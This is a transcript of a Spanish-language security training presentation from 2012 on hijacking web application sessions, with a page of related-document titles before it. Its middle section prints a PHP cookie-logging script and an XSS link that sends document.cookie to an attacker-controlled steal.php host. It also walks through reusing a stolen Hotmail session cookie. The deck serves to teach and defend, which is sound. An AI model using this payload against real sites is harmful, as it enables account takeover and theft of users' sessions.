Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web Parte II. Omar Palomino

Documentos relacionados
Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web. Omar Palomino.

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Analizando Skype Forense

Anonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com.

Las cookies son utilizadas habitualmente por los servidores web para diferenciar usuarios y para actuar de diferente forma dependiendo de éstos.

SEGURIDAD Y ALTA DISPONIBILIDAD

Ataques XSS en Aplicaciones Web

ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO

Webinar Gratuito Vulnerabilidades en Aplicaciones Web

Seguridad Web: SQL Injection & XSS

Seguridad Web: SQL Injection & XSS

Desarrollo de aplicaciones seguras. (Técnicas de ataque y defensa)

Seguridad Web. Álvaro Gómez Giménez UAM.NET. Álvaro Gómez Giménez (UAM.NET) Seguridad Web / 19

Seguridad Informática: Técnicas hacker

MASTER HACKING Mobile Devices

Recomendaciones sobre protección de Dominios en Internet. Julio César Cossío NIC México.

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro antonio@noveria.es

Diplomado CiberSeguridad defensa y ataque de un ecosistema tecnológico.

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades

Desarrollo Seguro. Programa de Estudio.

Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

Vulnerabilidades en Aplicaciones Web Webinar Gratuito

Javier Garson Desarrollador web Abril CSRF Falsificando peticiones

12/2016. Cambia tus contraseñas a menudo. Google soluciona 74 vulnerabilidades en Android. Mozilla publica actualizaciones para Firefox y Firefox ESR

Amenazas a Aplicaciones Web Ing. Mauricio Andrade Guzmán. Subdirección de Seguridad de la Información/UNAM-CERT

PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE. Ing. Javier Hernández Calderón Consultor en Seguridad Informática

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES.

SEGURIDAD EN APLICACIONES WEB. Autor: Siler Amador Donado

Backdoors en Sistemas Operativos. Instalación, configuración y uso de Backdoors

PRIMEROS PASOS EN LA APLICACIÓN REA

Seguridad Ofensiva en WordPress

SERVICIOS COMPUTACIONALES PROGRESS

Desarrollo y servicios web

Implementación y análisis del protocolo HTTPS

MANUAL DE USUARIO. Versión: 3.5

Seguridad en la entrega aplicaciones

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

.com [IN]SEGURIDAD WEB ING. SAUL MAMANI M.

Adquiere las habilidades que el mundo está buscando


Introducción a OWASP TOP Ten Segu-Info &

AMENAZAS AVANZADAS Y PERSISTENTES

Corporación Ornitorrinco Labs

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Analista Consultor en Seguridad Informática IT: Ethical Hacking

Resolución de incidencias para el applet Versión 1.0

Hacking Ético Web. I Jornadas Tecnológicas CEEPS Carlos García García i52gagac@uco.es

Curso de Consultor en Seguridad Informática IT: Ethical Hacking (Titulación Universitaria con 4 Créditos ECTS)

Introducción a OWASP OWASP. The OWASP Foundation

PARTE 1. XSS indirecto

Ataques Web Automáticos: Identificación, Engaño y Contraataque

Computación Web (Curso 2013/2014)

Durante el uso de nuestra página Web usted acepta y autoriza expresamente el uso de cookies, de acuerdo con nuestra Política de Privacidad.

Conseguir información sobre los hábitos de navegación del usuario, entre otras.

Manual Configuración equipos para Firma Electrónica IGAPE

Navegadores. Los navegadores. Privacidad. Oscar Herrero INTERNET SEGURO CEIP ARCIPRESTE DE HITA. Fuente:OSI

Cualidades de la seguridad de la información 59 Metodología para mejorar la seguridad de la información 61 Retos en la seguridad de la información 66

Webinar Gratuito OWASP WebScarab

OVIA: Oficina Virtual de Impuestos Autonómicos

Presentación del curso Presencial

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DEL CLIENTE VoIP X-LITE

Anexo IV Vulnerabilidades más críticas de los sistemas informáticos

MINT A NIVEL BROSERW CON BEEF

Informe presentación ELO-323 redes de computadores II

Informe de análisis de riesgo en servidores. Julio Realizado por: Trend Micro

Técnicas de Hacking Ético en un Laboratorio de Pentesting Virtualizado

LECCION-2. Por omitir las cosas triviales se comenten grandes errores. Cursos de Entrenamiento de Servidores Linux y Telefonía IP con Asterisk/Elastix

Auditoría Técnica de Seguridad de Aplicaciones Web

Por último hablaremos sobre los empleados poco seguros.

Cuáles son los navegadores de internet más seguros?

INTRAMEDER SL comunica a los usuarios, a través de este aviso, que puede utilizar cookies cuando el usuario navega por las diferentes pantallas y

Búsqueda de vulnerabilidades - Análisis. 22 o Escuela de Verano de Ciencias Informáticas RIO 2015

Implementación de ModSecurity Firewall de Aplicación Web L.I. Dante Odín Ramírez López

CrossFire: complementos de Firefox pueden ser explotados malicionamente

AMECI Asociación Mexicana de Ciberseguridad. Pentesting aplicaciones WEB Versión 2018-V2.0 AM-PTW Modalidad: e-learning Ficha Técnica

SEGURIDAD BANCARIA Y DE LA INFORMACIÓN Transacciones Seguras Nuestro desafío

Bloque I: Seguridad web

Seguridad de un Portal

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Análisis de Tráfico de Datos. para certificar que khipu no recibe las claves bancarias de sus usuarios.

Computación Web (Curso 2013/2014)

CURSO DE ETHICAL HACKING

Análisis de Tráfico de Datos. para certificar que khipu no recibe las claves bancarias de sus usuarios.

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

PROGRAMACIÓN SEGURA EN PHP Héctor A. Mantellini VaSlibre CODIGO LIMPIO CODIGO SEGURO.

Aplicaciones WEB vulnerables: Una puerta de entrada para los intrusos

Cómo utiliza Michelin las cookies

Boletín de Consultoría Gerencial Ataques sobre cuentas de redes sociales

1. Componentes de la firma digital

De esta manera, cuando el usuario rellena un campo cómo el siguiente... <input type="text" name="telefono"> </form>

ABC de la ciberseguridad. Por: Gizard G.

INFORMACIÓN SOBRE COOKIES

Manual de uso Inventarios App v2

Sistema Médico Ocupacional SameWeb

Transcripción:

Session Hijacking Session Hijacking: Secuestro y robo de aplicaciones web Parte II Abril, 2012 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe

Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+, ITIL v3. Consultor en seguridad de información de KUNAK Consulting. Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres:

AVISO Y CONSIDERACIONES LEGALES Las técnicas mostradas en la presentación tienen por objetivo CONOCER las técnicas utilizadas por los hackers para robar y secuestrar aplicaciones web. La presentación NO TIENE POR OBJETIVO enseñar técnicas para realizar ataques contra aplicaciones web que son penados según la legislación de los países. El autor no se hace responsable del mal uso de las técnicas mostradas en la presentación.

Funcionamiento 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Aplicaciones web particulares (corporativos) 2 Importante: El usuario (la víctima) no se entera que su sesión de aplicación web ha sido vulnerada. El atacante encuentra un mecanismo para averiguar el identificador de SESIÓN y realizar el secuestro de la sesión del usuario.

Funcionamiento: Cross Site Scripting 2 1. Un usuario normal ingresa a la App. Web y ejecuta el código Javascript. 2. El código Javascript envía el código de Sesión al servidor web externo. 1 Importante: Un usuario perspicaz puede darse cuenta de la inserción de código malicioso en la página web. 1. El usuario malicioso prepara un servidor web externo para almacenar las. 2. El usuarios malicioso coloca código JavaScript sobre la App. Web Vulnerable. 5

Funcionamiento: Cross Site Scripting <?php $session = $_GET["cookie"]; $date = date("l ds of F Y h:i:s A"); $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('log.txt','a'); fwrite($file, "DATE: $date USER AGENT: $user_agent COOKIE: $session \n"); fclose($file); header("location: http://xxxxxxx/hijacking/listado.php");?> 1 Importante: Un usuario perspicaz puede darse cuenta de la inserción de código malicioso en la página web. <a href="#" onclick=document.location="http://192. 168.1.48/steal.php?cookie="+escape(doc ument.cookie);>ver aqui los detalles</a> 6

Por qué sucede esto? 1 Cuando el usuario ingresa a una página web: 1. Se crea una sesión aleatoria en el servidor web, esta sesión se almacena en una cookie o en una sesión. 2. Esta cookie viaja por la web cada vez que el cliente navega por la aplicación. La cookie contiene un identificador de sesión. Esto sucede porque: La transmisión de la sesión viaja en texto plano. Algoritmo débil de ID de sesión ( predecibles o muy pequeñas). Incorrecta configuración del bloqueo de. Sesiones que nunca expiran. 2 1. El atacante realiza un ataque para conseguir la sesión del usuario: Hombre en el medio (Man in the middle MiTM) Predecir el identificador de sesión (Predict Session) Cross site scripting (XSS) Otros de menos probabilidad 2. El atacante modifica la cookie e ingresa a la aplicación web con el contenido restringido de la víctima.

Vamos a la práctica Aplicación web PHP : 1. Capturamos la sesión mediante la técnica de hombre en el medio. 2. Identificamos la cookie y el número de sesión. 3. Modificamos la cookie mediante una herramienta: Advanced Cookie Manager. 4. Accedemos a la aplicación sin usuario ni contraseña. Aplicaciones web en internet (HOTMAIL): 1. Capturamos la sesión mediante la técnica de hombre en el medio. 2. Identificamos la cookie: RPSTAuth 3. Modificamos la cookie mediante una herramienta: Advanced Cookie Manager. 4. Accedemos a la aplicación sin usuario ni contraseña.

Cookies de aplicaciones web conocidas Cómo averiguo cuál es la COOKIE que me interesa? Entra a la aplicación web e identifica cookie por cookie cual es la importante. Google te lo puede decir (ya antes alguien se ha preguntado lo mismo).

Debemos automatizar el ataque. Hamster y Ferret Ferret: Herramienta para formatear el archivo PCAP producto del sniffing. Hamster: Proxy que muestra las cookies formateadas por Ferret. que funcionan en Windows y Linux. Firesheep Plugin de Mozilla Firefox Automatiza de manera muy rápida el robo de. A la fecha (2012) el plugin está descontinuado. Greasemonkey Plugin de Mozilla Firefox Permite ingresar la cookie capturada mediante MITM

Cómo evitamos el Envío de a través de un canal encriptado (HTTPS) Generar el identificador de sesión después de un login exitoso Evitar vulnerabilidades de aplicaciones web: XSS y correcta finalización de.

Session Hijacking Session Hijacking: Secuestro y robo de aplicaciones web Abril, 2012 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe